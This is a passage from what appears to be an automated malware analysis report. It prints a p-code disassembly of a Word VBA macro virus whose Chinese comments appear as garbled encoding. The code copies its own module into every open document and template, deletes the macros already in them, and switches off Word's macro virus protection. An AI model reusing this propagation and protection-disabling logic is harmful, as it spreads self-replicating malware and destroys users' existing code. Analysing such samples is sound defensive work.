' FuncDefn (Public Function InfectAll() As Boolean)
' Line #43:
' Dim
' VarDefn myDoc
' VarDefn myTemp (As Template)
' Line #44:
' QuoteRem 0x0004 0x0018 "Ďň´ňżŞµÄÎĵµÖĐĐ´Č뱾´úÂë"
' Line #45:
' StartForVariable
' Ld myDoc
' EndForVariable
' Ld Documents
' ForEach
' Line #46:
' Ld myDoc
' ArgsCall Infect 0x0001
' Line #47:
' StartForVariable
' Ld myDoc
' EndForVariable
' NextVar
' Line #48:
' QuoteRem 0x0004 0x0016 "ĎňWORDÄŁ°ĺÖĐĐ´Č뱾´úÂë"
' Line #49:
' StartForVariable
' Ld myTemp
' EndForVariable
' Ld Templates
' ForEach
' Line #50:
' Ld myTemp
' ArgsCall Infect 0x0001
' Line #51:
' StartForVariable
' Ld myTemp
' EndForVariable
' NextVar
' Line #52:
' LitVarSpecial (True)
' St InfectAll
' Line #53:
' EndFunc
' Line #54:
' QuoteRem 0x0000 0x0028 "ÇĺłýËůÓĐ´ňżŞÎĵµĽ°ÄŁ°ĺÖеIJˇ¶ľÄŁżéĽ°´úÂë"
' Line #55:
' FuncDefn (Public Function ClearVirus() As Boolean)
' Line #56:
' Dim
' VarDefn i (As Integer)
' Line #57:
' Dim
' VarDefn myDoc
' VarDefn myTemp (As Template)
' Line #58:
' Dim
' VarDefn Cleared (As Boolean)
' Line #59:
' Line #60:
' LitVarSpecial (True)
' St ClearVirus
' Line #61:
' QuoteRem 0x0004 0x0012 "Ľě˛éËůÓĐÎĵµ˛˘Çĺłý"
' Line #62:
' StartForVariable
' Ld myDoc
' EndForVariable
' Ld Documents
' ForEach
' Line #63:
' Ld myDoc
' ArgsLd ClearDocument 0x0001
' St Cleared
' Line #64:
' Ld Cleared
' Not
' IfBlock
' Line #65:
' LitStr 0x0020 "˛ˇ¶ľÇĺłýą¤×÷˛»łÉą¦Ł¬ÇëĽě˛éÔŇňˇŁ"
' Ld vbOKOnly
' Ld myDoc
' MemLd New
' ArgsCall MsgBox 0x0003
' Line #66:
' LitVarSpecial (False)
' St ClearVirus
' Line #67:
' EndIfBlock
' Line #68:
' StartForVariable
' Ld myDoc
' EndForVariable
' NextVar
' Line #69:
' QuoteRem 0x0004 0x0012 "Ľě˛éËůÓĐÄŁ°ĺ˛˘Çĺłý"
' Line #70:
' StartForVariable
' Ld myTemp
' EndForVariable
' Ld Templates
' ForEach
' Line #71:
' Ld myTemp
' ArgsLd ClearDocument 0x0001
' St Cleared
' Line #72:
' Ld Cleared
' Not
' IfBlock
' Line #73:
' LitStr 0x0020 "˛ˇ¶ľÇĺłýą¤×÷˛»łÉą¦Ł¬ÇëĽě˛éÔŇňˇŁ"
' Ld vbOKOnly
' Ld myTemp
' MemLd New
' ArgsCall MsgBox 0x0003
' Line #74:
' LitVarSpecial (False)
' St ClearVirus
' Line #75:
' EndIfBlock
' Line #76:
' StartForVariable
' Ld myTemp
' EndForVariable
' NextVar
' Line #77:
' EndFunc
' Line #78:
' QuoteRem 0x0000 0x0048 "Ľě˛éËůÓĐ´ňżŞµÄÎĵµĽ°ÄŁ°ĺÖĐĘÇ·ńÓвˇ¶ľ´ćÔÚŁ¬ČçąűÓĐŁ¬·µ»Ř˛ˇ¶ľĐĹϢĂčĘö×Ö·ű´®"
' Line #79:
' FuncDefn (Public Function ScanVirus() As Boolean)
' Line #80:
' Dim
' VarDefn DocsCount (As Integer)
' VarDefn i (As Integer)
' VarDefn ret (As Integer)
' Line #81:
' Dim
' VarDefn myStr (As String)
' Line #82:
' Dim
' VarDefn myDoc
' VarDefn myTemp (As Template)
' Line #83:
' Line #84:
' LitVarSpecial (False)
' St ScanVirus
' Line #85:
' LitStr 0x0000 ""
' St pVirusReport
' Line #86:
' QuoteRem 0x0004 0x001E "Ľě˛éËůÓĐ´ňżŞµÄÎĵµÖĐĘÇ·ńÓвˇ¶ľ"
' Line #87:
' StartForVariable
' Ld myDoc
' EndForVariable
' Ld Documents
' ForEach
' Line #88:
' Ld myDoc
' ArgsLd ScanDocument 0x0001
' St ret
' Line #89:
' Ld ret
' SelectCase
' Line #90:
' Ld cOK
' Case
' Ld cDocProtected
' Case
' CaseDone
' Line #91:
' Ld cDocHasModuleElse
' Case
' Ld cDocHasCodeElse
' Case
' Ld cDocHasAllElse
' Case
' CaseDone
' Line #92:
' LitVarSpecial (True)
' St ScanVirus
' Line #93:
' CaseElse
' Line #94:
' LitStr 0x002C "şŻĘýScanDocument·µ»Ř´íÎó´úÂ룬ϵͳÎŢ·¨Ę¶±đˇŁ"
' Ld vbOKOnly
' LitStr 0x0008 "ϵͳłö´í"
' ArgsCall MsgBox 0x0003
' Line #95:
' EndSelect
' Line #96:
' StartForVariable
' Ld myDoc
' EndForVariable
' NextVar
' Line #97:
' QuoteRem 0x0004 0x000C "Ľě˛éËůÓĐÄŁ°ĺ"
' Line #98:
' StartForVariable
' Ld myTemp
' EndForVariable
' Ld Templates
' ForEach
' Line #99:
' Ld myTemp
' ArgsLd ScanDocument 0x0001
' St ret
' Line #100:
' Ld ret
' SelectCase
' Line #101:
' Ld cOK
' Case
' Ld cDocProtected
' Case
' CaseDone
' Line #102:
' Ld cDocHasModuleElse
' Case
' Ld cDocHasCodeElse
' Case
' Ld cDocHasAllElse
' Case
' CaseDone
' Line #103:
' LitVarSpecial (True)
' St ScanVirus
' Line #104:
' CaseElse
' Line #105:
' LitStr 0x002C "şŻĘýScanDocument·µ»Ř´íÎó´úÂ룬ϵͳÎŢ·¨Ę¶±đˇŁ"
' Ld vbOKOnly
' LitStr 0x0008 "ϵͳłö´í"
' ArgsCall MsgBox 0x0003
' Line #106:
' EndSelect
' Line #107:
' StartForVariable
' Ld myTemp
' EndForVariable
' NextVar
' Line #108:
' EndFunc
' Line #109:
' QuoteRem 0x0000 0x0016 "ąŘ±ŐWordşę˛ˇ¶ľ±Ł»¤ą¦ÄÜ"
' Line #110:
' ConstFuncExpr
' LitVarSpecial (False)
' FuncDefn (Public Function CloseVirusProtection(Optional Protected As Boolean))
' Line #111:
' Ld Protected
' Ld Options
' MemSt VirusProtection
' Line #112:
' EndFunc
' Line #113:
' QuoteRem 0x0000 0x0028 "°Ń±ľłĚĐň´úÂë´ÓŇ»¸öÎÄĽţ¸´ÖƵ˝ÁíŇ»¸öÎÄĽţÖĐ"
' Line #114:
' FuncDefn (Private Function Infect(TargetFile) As Boolean)
' Line #115:
' Dim
' VarDefn xItem
' VarDefn CommandStr (As String)
' VarDefn file (As String)
' Line #116:
' Dim
' VarDefn myDoc
' VarDefn myTemp (As Template)
' Line #117:
' Dim
' VarDefn LinesofCode (As Long)
' VarDefn myStr (As String)
' Line #118:
' Line #119:
' QuoteRem 0x0004 0x0014 "Ľě˛é˛ÎĘýŔŕĐÍĘÇ·ńŐýČ·"
' Line #120:
' Ld TargetFile
' ArgsLd TypeName 0x0001
' St myStr
' Line #121:
' Ld myStr
' LitStr 0x0008 "Document"
' Ne
' Ld myStr
' LitStr 0x0008 "Template"
' Ne
' And
' IfBlock
' Line #122:
' LitStr 0x000C "ĘąÓĂĘýľÝŔŕĐÍ"
' Ld myStr
' Add
' LitStr 0x0036 "µ÷ÓĂşŻĘýInfectŁ¬ĎµÍłÖ»ÔĘĐíĘąÓĂDocumentĽ°TemplateŔŕĐ͡Ł"
' Add
' Ld vbOKOnly
' LitStr 0x0008 "ϵͳ´íÎó"
' ArgsCall MsgBox 0x0003
' Line #123:
' LitVarSpecial (False)
' St Infect
' Line #124:
' ExitFunc
' Line #125:
' EndIfBlock
' Line #126:
' LitVarSpecial (True)
' St Infect
' Line #127:
' Ld TargetFile
' MemLd New
' Ld ThisDocument
' MemLd New
' Eq
' If
' BoSImplicit
' ExitFunc
' EndIf
' QuoteRem 0x003E 0x0024 "Äż±ęÎÄĽţÓëÔ´ÎÄĽţĎŕͬʱ˛»Ö´ĐĐĐ´Čë˛Ů×÷"
' Line #128:
' Ld TargetFile
' ArgsLd Infected 0x0001
' If
' BoSImplicit
' ExitFunc
' EndIf
' QuoteRem 0x002F 0x001A "Äż±ęÎÄĽţŇŃľ´ćÔÚ±ľłĚĐň´úÂë"
' Line #129:
' Ld TargetFile
' MemLd VBProject
' MemLd Protection
' If
' BoSImplicit
' ExitFunc
' EndIf
' QuoteRem 0x003A 0x0020 "Äż±ęÎÄĽţ±»±Ł»¤Ł¬˛»ÄÜÖ´ĐĐĐ´Čë˛Ů×÷"
' Line #130:
' LitVarSpecial (False)
' St Infect
' Line #131:
' Line #132:
' QuoteRem 0x0004 0x0026 "ÇĺłýÄż±ęÎĵµÖĐŇŃľ´ćÔÚµÄĆäËűÄŁżéĽ°´úÂë"
' Line #133:
' StartForVariable
' Ld xItem
' EndForVariable
' Ld TargetFile
' MemLd VBProject
' MemLd VBComponents
' ForEach
' Line #134:
' Ld xItem
' MemLd New
' LitStr 0x000C "ThisDocument"
' Eq
' IfBlock
' Line #135:
' Ld xItem
' MemLd CodeModule
' MemLd CountOfLines
' St LinesofCode
' Line #136:
' Ld LinesofCode
' LitDI2 0x0000
' Gt
' If
' BoSImplicit
' LitDI2 0x0001
' Ld LinesofCode
' Ld xItem
' MemLd CodeModule
' ArgsMemCall DeleteLines 0x0002
' EndIf
' Line #137:
' ElseBlock
' Line #138:
' Ld xItem
' Ld TargetFile
' MemLd VBProject
' MemLd VBComponents
' ArgsMemCall Remove 0x0001
' Line #139:
' EndIfBlock
' Line #140:
' StartForVariable
' Ld xItem
' EndForVariable
' NextVar
' Line #141:
' Line #142:
' QuoteRem 0x0004 0x001C "ĎňÎĵµÖĐĐ´Č뱾łĚĐň´úÂ뼰ģżé"
' Line #143:
' Ld ThisDocument
' MemLd FullName
' LitStr 0x0001 ":"
' Add
' Ld cMyModule
' Add
' Ld TargetFile
' MemLd FullName
' LitStr 0x0001 ":"
' Add
' Ld cMyModule
' Add
' Ld WordBasic
' ArgsMemCall macrocopy 0x0002
' Line #144:
' Ld ThisDocument
' MemLd FullName
' LitStr 0x0001 ":"
' Add
' Ld cMyUserForm
' Add
' Ld TargetFile
' MemLd FullName
' LitStr 0x0001 ":"
' Add
' Ld cMyUserForm
' Add
' Ld WordBasic
' ArgsMemCall macrocopy 0x0002
' Line #145:
' Line #146:
' QuoteRem 0x0004 0x0047 " ^o^ ^o^ ^o^ ^o^ ^o^ ^o^ ^o^ ^o^ ^o^ ^o^ ^o^ ^o^ ^o^ ^o^ ^o^ ^o^"
' Line #147:
' Line #148:
…
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.